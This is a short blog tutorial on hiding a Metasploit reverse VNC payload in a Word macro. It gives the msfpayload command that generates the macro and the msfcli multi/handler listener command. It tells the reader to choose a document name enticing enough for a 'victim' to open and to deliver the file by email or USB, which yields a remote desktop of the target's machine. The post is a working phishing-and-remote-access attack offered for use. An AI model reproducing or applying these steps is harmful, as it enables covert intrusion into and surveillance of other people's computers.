Subscribe by RSS RSS Icon
Follow me on Twitter Twitter Icon

Reverse VNC Hidden in a Word File

Metasploit has this payload feature for Reverse VNC connection which can be hidden in a Word file and get VNC desktop of the remote user. Credits goes to Punter of for this tutorial.

Metasploit will create a macro  which will be embedded in a Word document. When a user opens the Word document, we get a reverse VNC of the target system. It is not required to install VNC on the Victim's PC. You can also do this on WAN but you need to forward port 4444  on your modem or router.

1) Create a Macro to embed in Word

./msfpayload windows/vncinject/reverse_tcp LHOST= V > /tmp/punter.bas

2) Copy that punter.bas file in windows and open msoffice 2003 –>tools–>macro–>visualbasic editor. Then go to File–>import file–> and choose the punter.bas and save it with a name ex: macrogame.doc. You have to make the document name interesting enough for the victim to open the file. Now send this file to victim via mail or USB.

3) In Backtrack, we have to open a listening port to receive the reverse connection from our victim. 

./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST= DisableCourtesyShell=True E

When the victim open the file, it will be asked if he/she wished to accept or not to run the macro. If the user accepts, the connection will be initiated and you will have VNC client opens on Backtack.

You can also watch the video tutorial here:


Copyright Info.

Only for my personal reference. I do not own any of these materials here. Use it at your own risk!

XHTML/CSS validations
Valid XHTML 1.0 Transitional Valid CSS!